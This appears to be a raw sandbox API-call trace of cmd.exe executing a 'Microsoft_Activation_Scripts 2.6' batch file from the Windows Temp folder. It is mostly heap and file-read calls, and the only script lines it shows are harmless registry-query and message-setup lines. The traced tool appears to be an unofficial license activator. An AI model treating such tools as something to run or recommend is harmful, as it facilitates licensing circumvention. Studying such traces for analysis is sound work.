[0176.396] GetProcessHeap () returned 0x19a8f1e0000 [0176.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f10) returned 1 [0176.396] GetProcessHeap () returned 0x19a8f1e0000 [0176.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0176.396] GetProcessHeap () returned 0x19a8f1e0000 [0176.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb6f0) returned 1 [0176.397] GetProcessHeap () returned 0x19a8f1e0000 [0176.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea500) returned 1 [0176.397] GetProcessHeap () returned 0x19a8f1e0000 [0176.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ead50) returned 1 [0176.398] GetProcessHeap () returned 0x19a8f1e0000 [0176.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0176.398] GetProcessHeap () returned 0x19a8f1e0000 [0176.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0176.398] GetProcessHeap () returned 0x19a8f1e0000 [0176.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0176.398] GetProcessHeap () returned 0x19a8f1e0000 [0176.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0176.399] GetProcessHeap () returned 0x19a8f1e0000 [0176.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa2f0) returned 1 [0176.399] GetProcessHeap () returned 0x19a8f1e0000 [0176.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0176.399] GetProcessHeap () returned 0x19a8f1e0000 [0176.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.400] GetProcessHeap () returned 0x19a8f1e0000 [0176.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9180) returned 1 [0176.400] GetProcessHeap () returned 0x19a8f1e0000 [0176.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0176.400] GetProcessHeap () returned 0x19a8f1e0000 [0176.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6a0) returned 1 [0176.400] GetProcessHeap () returned 0x19a8f1e0000 [0176.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0176.401] GetProcessHeap () returned 0x19a8f1e0000 [0176.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0176.401] GetProcessHeap () returned 0x19a8f1e0000 [0176.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0176.402] GetProcessHeap () returned 0x19a8f1e0000 [0176.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0176.402] GetProcessHeap () returned 0x19a8f1e0000 [0176.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd20) returned 1 [0176.402] GetProcessHeap () returned 0x19a8f1e0000 [0176.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0db0) returned 1 [0176.402] GetProcessHeap () returned 0x19a8f1e0000 [0176.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0176.402] GetProcessHeap () returned 0x19a8f1e0000 [0176.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0176.403] GetProcessHeap () returned 0x19a8f1e0000 [0176.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0176.403] GetProcessHeap () returned 0x19a8f1e0000 [0176.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0176.403] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb20) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ca0) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec660) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0176.404] GetProcessHeap () returned 0x19a8f1e0000 [0176.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0176.405] GetProcessHeap () returned 0x19a8f1e0000 [0176.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0176.405] GetProcessHeap () returned 0x19a8f1e0000 [0176.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0176.405] GetProcessHeap () returned 0x19a8f1e0000 [0176.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0176.405] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.405] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe83 [0176.405] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.405] SetFilePointer (in: hFile=0x9c, lDistanceToMove=3717, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe85 [0176.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0176.406] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.406] GetFileType (hFile=0x9c) returned 0x1 [0176.406] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.406] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe85 [0176.406] GetProcessHeap () returned 0x19a8f1e0000 [0176.406] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.406] GetProcessHeap () returned 0x19a8f1e0000 [0176.406] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.406] _tell (_FileHandle=3) returned 3717 [0176.406] _close (_FileHandle=3) returned 0 [0176.407] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.407] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0176.407] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.407] SetFilePointer (in: hFile=0x9c, lDistanceToMove=3717, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe85 [0176.407] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.407] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe85 [0176.407] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.407] SetFilePointer (in: hFile=0x9c, lDistanceToMove=3735, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0176.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_colorprep\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="call :_colorprep\r\n10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 18 [0176.407] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.407] GetFileType (hFile=0x9c) returned 0x1 [0176.407] _get_osfhandle (_FileHandle=3) returned 0x9c [0176.408] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0176.408] GetProcessHeap () returned 0x19a8f1e0000 [0176.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.408] GetProcessHeap () returned 0x19a8f1e0000 [0176.408] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.408] _wcsicmp (_String1="call", _String2=")") returned 58 [0176.408] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0176.408] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0176.408] _wcsicmp (_String1="IF", _String2="call") returned 6 [0176.408] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0176.408] _wcsicmp (_String1="REM", _String2="call") returned 15 [0176.408] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0176.408] GetProcessHeap () returned 0x19a8f1e0000 [0176.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0176.408] GetProcessHeap () returned 0x19a8f1e0000 [0176.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb7a0 [0176.409] GetProcessHeap () returned 0x19a8f1e0000 [0176.409] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e09b0 [0176.409] _tell (_FileHandle=3) returned 3735 [0176.409] _close (_FileHandle=3) returned 0 [0176.409] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0176.409] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0176.409] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0176.409] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0176.409] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0176.409] _wcsicmp (_String1="call", _String2="CD") returned -3 [0176.409] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0176.409] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0176.409] _wcsicmp (_String1="call", _String2="REN") returned -15 [0176.409] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0176.409] _wcsicmp (_String1="call", _String2="SET") returned -16 [0176.409] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0176.409] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0176.409] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0176.409] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0176.409] _wcsicmp (_String1="call", _String2="MD") returned -10 [0176.409] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0176.409] _wcsicmp (_String1="call", _String2="RD") returned -15 [0176.409] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0176.409] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0176.409] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0176.410] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0176.410] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0176.410] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0176.410] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.410] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0176.410] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0176.410] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0176.410] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0176.410] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0176.410] _wcsicmp (_String1="call", _String2="CD") returned -3 [0176.410] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0176.410] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0176.410] _wcsicmp (_String1="call", _String2="REN") returned -15 [0176.410] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0176.410] _wcsicmp (_String1="call", _String2="SET") returned -16 [0176.410] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0176.410] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0176.410] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0176.410] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0176.411] _wcsicmp (_String1="call", _String2="MD") returned -10 [0176.411] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0176.411] _wcsicmp (_String1="call", _String2="RD") returned -15 [0176.411] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0176.411] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0176.411] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0176.411] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0176.411] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0176.411] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f8f50 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8f50, Size=0x2a) returned 0x19a8f1e0cf0 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0cf0) returned 0x2a [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0b30 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1f9f80 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.411] GetProcessHeap () returned 0x19a8f1e0000 [0176.412] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.412] GetProcessHeap () returned 0x19a8f1e0000 [0176.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.412] GetProcessHeap () returned 0x19a8f1e0000 [0176.413] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.413] _wcsicmp (_String1=":_colorprep", _String2=")") returned 17 [0176.413] _wcsicmp (_String1="FOR", _String2=":_colorprep") returned 44 [0176.413] _wcsicmp (_String1="FOR/?", _String2=":_colorprep") returned 44 [0176.413] _wcsicmp (_String1="IF", _String2=":_colorprep") returned 47 [0176.413] _wcsicmp (_String1="IF/?", _String2=":_colorprep") returned 47 [0176.413] _wcsicmp (_String1="REM", _String2=":_colorprep") returned 56 [0176.413] _wcsicmp (_String1="REM/?", _String2=":_colorprep") returned 56 [0176.413] GetProcessHeap () returned 0x19a8f1e0000 [0176.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0176.413] GetProcessHeap () returned 0x19a8f1e0000 [0176.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb800 [0176.413] GetProcessHeap () returned 0x19a8f1e0000 [0176.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e8) returned 0x19a8f1eabb0 [0176.413] SaferWorker () returned 0x0 [0176.416] GetProcessHeap () returned 0x19a8f1e0000 [0176.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0176.416] GetProcessHeap () returned 0x19a8f1e0000 [0176.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0176.417] GetProcessHeap () returned 0x19a8f1e0000 [0176.417] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0176.417] GetProcessHeap () returned 0x19a8f1e0000 [0176.417] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0176.417] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3 [0176.417] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2 [0176.417] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3 [0176.417] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13 [0176.417] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4 [0176.417] _wcsicmp (_String1="GOTO", _String2="CD") returned 4 [0176.417] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4 [0176.417] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11 [0176.417] _wcsicmp (_String1="GOTO", _String2="REN") returned -11 [0176.417] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2 [0176.417] _wcsicmp (_String1="GOTO", _String2="SET") returned -12 [0176.417] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9 [0176.417] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3 [0176.417] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13 [0176.417] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9 [0176.417] _wcsicmp (_String1="GOTO", _String2="MD") returned -6 [0176.417] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6 [0176.417] _wcsicmp (_String1="GOTO", _String2="RD") returned -11 [0176.417] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11 [0176.417] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9 [0176.417] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0 [0176.417] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe620, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.427] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3 [0176.427] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2 [0176.427] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3 [0176.427] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13 [0176.427] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4 [0176.427] _wcsicmp (_String1="GOTO", _String2="CD") returned 4 [0176.427] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4 [0176.427] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11 [0176.427] _wcsicmp (_String1="GOTO", _String2="REN") returned -11 [0176.427] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2 [0176.427] _wcsicmp (_String1="GOTO", _String2="SET") returned -12 [0176.427] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9 [0176.427] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3 [0176.427] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13 [0176.427] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9 [0176.428] _wcsicmp (_String1="GOTO", _String2="MD") returned -6 [0176.428] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6 [0176.428] _wcsicmp (_String1="GOTO", _String2="RD") returned -11 [0176.428] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11 [0176.428] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9 [0176.428] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0 [0176.428] GetProcessHeap () returned 0x19a8f1e0000 [0176.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9180 [0176.428] GetProcessHeap () returned 0x19a8f1e0000 [0176.428] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9180, Size=0x28) returned 0x19a8f1eb710 [0176.428] GetProcessHeap () returned 0x19a8f1e0000 [0176.428] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x28 [0176.428] GetProcessHeap () returned 0x19a8f1e0000 [0176.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0a70 [0176.428] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe0b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0176.428] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0176.428] _get_osfhandle (_FileHandle=3) returned 0xac [0176.428] SetFilePointer (in: hFile=0xac, lDistanceToMove=3735, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0176.428] _get_osfhandle (_FileHandle=3) returned 0xac [0176.429] GetFileSize (in: hFile=0xac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d9ee [0176.429] _wcsnicmp (_String1="_col", _String2=":EOF", _MaxCount=0x4) returned 37 [0176.429] _get_osfhandle (_FileHandle=3) returned 0xac [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0176.429] _get_osfhandle (_FileHandle=3) returned 0xac [0176.429] GetFileType (hFile=0xac) returned 0x1 [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe97 [0176.429] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=3737, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0176.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ncolorprep") returned 2 [0176.429] _get_osfhandle (_FileHandle=3) returned 0xac [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0176.429] _get_osfhandle (_FileHandle=3) returned 0xac [0176.429] GetFileType (hFile=0xac) returned 0x1 [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe99 [0176.429] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.429] SetFilePointer (in: hFile=0xac, lDistanceToMove=3787, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0176.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\nan empty line at the end of the script is missing.") returned 50 [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.430] GetFileType (hFile=0xac) returned 0x1 [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xecb [0176.430] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=3851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0176.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\n", cbMultiByte=64, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\nat the end of the script is missing.") returned 64 [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.430] GetFileType (hFile=0xac) returned 0x1 [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0176.430] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, 